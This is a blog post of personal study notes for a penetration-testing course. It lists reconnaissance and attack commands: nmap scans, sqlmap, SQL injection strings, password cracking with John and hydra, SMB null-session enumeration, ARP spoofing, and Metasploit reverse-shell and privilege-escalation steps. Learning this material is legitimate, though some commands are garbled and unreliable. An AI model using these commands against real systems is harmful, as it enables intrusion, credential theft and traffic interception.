Tools and Commands learned from PTS → elearnsecurity:-

HackingSkills
7 min readSep 14, 2020

--

NOTE:- This write up is just my notes for PTS course. It does not dispense with what is offered by the elearnsecurity.

Tools:-

  1. wireshark:-is a protocol analyzer network sniffer, which allows to see the data transmitted over the network. (you will see if the data sent in clear-text or encrypted)
  2. Burp suit:- used to send http\https requests and analyze the requests and responses.
  3. subdomain enumeration tools:

a. google.com:- site: company.com

b. dnsdumpster.com

c. virustotal.com

4. Nessus:- is vulnerability assessment scan

once we download the nessus tool from https://www.tenable.com/

Open the terminal and type:- sudo dpkg -i the path of downloaded file

To start nessus type:-sudo service nessusd start then open:- https://www.tenable.com/

5. Dirbuster:- is tool to find hidden files and directories of websites.

6. ophcrack:- is rainbow table attack tool.

Commands (linux OS):-

  1. To view router table:- ip route
  2. To add a route manually:- sudo ip route add network-ip via gateway-ip
  3. To view ARP Cache:- ip neighbour
  4. To view network statistics and protocols status:- netstat
  5. To do reverse DNS resolution (from DNS name to ip):- ping
  6. To write or read something from web site and send http requests and analyze the requests and responses:- netcat\nc
  7. To write or read something from web site and send https requests and analyze the requests and responses:- openssl $_client -connect.
  8. subdomain enumeration (collect DNS data from various sources: sublist3r, amass
  9. To check if a machine is alive or not we use:-ping
  10. To perform ping sweep:- fping -a -g therange.
  • a → to view only alive hosts → for ping sweep (ip range)

11. To send error message and not viewing it in the output 2>/dev/null

12. To perform ping scan using nmap:-nmap -sn ip-address/range

13. To reed the ip-range for nmap tool:- nmap -iL file path

14. To do offline fingerprinting use:-p0f

15. To do active fingerprinting operating systems use:- nmap -O

16. To limit operating system scan:- nmap -O- -osscan-limit

17. To do scan using nmap without port scan:-nmap -Pn

18. To do TCP scan using nmap:- nmap -sT

19. To do SYN scan using nmap:- nmap -sS

20. To do version detection scan using nmap:- nmap -sV

21. To do port scan and specify the port number using nmap:- nmap -P pors

22. To see the reason why not reported:- nmap- -reason

23. To do scan in large company use:- masscan

24. To do fingerprinting on web servers by signature-based using httprint:-

httprint -P0 -h target -s signature files

  • P0 → to avoid pinging the host -h the target hosts -s the signature files

HTTP Verbs:-

GET:- to request web pages and pass arguments.
POST: to submit data in web forms.
HEAD: to show only the header of the responses.
PUT: to upload files to web servers.
DELETE: to remove a file from web servers.
OPTIONS: to query the web server for enabled http verbs.

25. To view the size in bytes of a file:- wc -m file

TCP connection between client and server.
UDP connection between client and server.
TCP connection between client and server and executing shell commands.

26. To use command line tool of Dirbuster:- dirb target.

27. To automate sql injection attack GET request using sql map:-

sqlmap –u [url] -p [options]

28. To automate sql injection attack POST request using sql map:-

sqlmap –u [url]- -data=[POST string] -p parameter [options]

  • h → for viewing sqlmap manual.
  • -u → to assign url target.
  • -p → to specify parameters and if we have only one parameter we can ignore it.
  • - -dbms= to specify database name.
  • - -technique= to specify sql injection technique.
  • -b/- -banner → to view banner information.
  • - -tables
  • - -columns
  • - -dump → to view tables entries.
  • - -wizard → to enumerate database for beginners.

29. John the Ripper is an extremely popular password cracking tool

— list=formats → to view john encryption formats → john- -list=formats

To crack password →unshadow passwd shadow > file to crack

To perform pure brute forcing →john -incremental -users:users list file to crack

To display discovered password by john → john- -show cracked file

To perform dictionary attack → john -wordlist[=word list file] file to crack

To do mangling → -rules

30. Tool used in network authentication:-hydra

  • without any switches/-h → for viewing hydra manual.
  • -U → for viewing details about a module.
  • -L →To lunch a usernames list inside a file.
  • -P →To lunch a passwords list inside a file.
  • module name: target → to specify a module.

31. Tool to display information about the target (file share) using samba suit:-nmblookup -A <ip address>

32. Tool to access file share using samba suit:-smbclient -L \\\\<ip address>\\share-name -N

  • -L →display all services available in a target.
  • -N →force a tool to not ask for a password.

33. To automate Null session exploitation:- enum4linux 10.130.40.80 -n

or

cd /usr/share/doc/python3-impacket/examples/

python3 samrdump.py 192.168.99.162

or

nmap -script=smb-enum-shares 192.168.99.162 → to check for null session

nmap -script=smb-enum-users 192.168.99.162 → to enumerate users

nmap -script=smb-enum-brute 192.168.99.162 →to perform brute force attack

ARP spoofing attack:-

34. To enable linux kernel ip forwarding:- echo 1 > /proc/sys/net/ipv4/ip_forward

or

sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

35. to intercept traffic on a switched LAN using Dsniff tools (MITM attack) :-arpspoof -i <interface> -t <target> -r <host>

36. To start MSFConsole:- msfconsole

  • show -h → to view the manual for show command.
  • search → to search about for a given term or module.
  • show exploits → to display exploits.
  • use the path of exploits → to use an exploit.
  • back → to cancel exploitations.
  • info → to display related information.
  • show options → to check exploitation options.
  • set options → to configure options.
  • show payload →to show executable payloads
  • set payload path →to choose payload
  • exploit → lunching an exploit.

common meterepter configurations:-

  • bind_tcp runs a server process on the target machine that waits for connections from the attacker machine →set payload java/meterpreter/bind_tcp
  • reverse_tcp performs a TCP connection back to the attacker machine →set payload linux/x86/meterpreter/reverse_tcp
  • bypassuac bypass the restriction use exploit/windows/local/bypassuac
  • background → to switch from a Meterpreter session to the console.
  • sessions -l → list opened sessions.
  • sessions -i number of session → to switch toan opened session.
  • sysinfo →retrieve information about the exploited machine.
  • ifconfig →prints the network configuration.
  • route →prints the routing information.
  • getuid — To know which user is running the process.
  • getsystem → privilege escalation.
  • shell → run standard command shell.
  • help →to display all Meterpreter commands.

38. to update metasploit framework:- sudo apt update ; sudo apt install metasploit-framework

39. To perform faster searches we use postgresql service to startit:-sudo service postgresql start

40. to start metasploit:- sudo msfdb init

41. To check if the machine is vulnerable against known vulnerabilities inside msfconsol:- nmap- -script smb-check-vulns.nse- -script-args=unsafe=1 <ip target>

42. To show the know vulnerability uusing nmap:- sudo nmap -p 445 — script vuln 10.10.10.4

43. To connect to a machine using telnet:- telnet ip address -l username.

Attacks:-

  1. XSS attack:-
The code in attacker server to save the cookies receive it from victim browser.
Code inserted in web site to infect it.

2. SQL injection

a. or 1=1;- — -

b. ‘ UNION SELECT null, null;- — -

Sometime we need to put ‘ before injection statements sometime not so we better try it both.

Commands (Windows OS):-

  1. Tool to display information about the target(file share):-nbtstat
  • /? → to view help manual.
  • A → display information about the target.
  • <00> →means workstation.
  • <02>means there is files sharing.

2. Tool to enumerate the shares:- NET VIEW <ip target>

3. To connect to a file share with no usernames and passwords to check for null session:- NET USE \\<ip target address> \IPC$ ‘ ’ /u:’ ’

4. To exploit Null session and enumerate file shares:-enum -S 10.130.40.80

  • -S → enumerate file shares
  • -U → enumerate users
  • -P →check the password policy

5. To automate Null session exploitation:- winfo 10.130.40.80 -n

6. To escalate the privilege:-getsystem

ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ

created in 14 September 2020

edited in 6 October 2020

ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ

--

--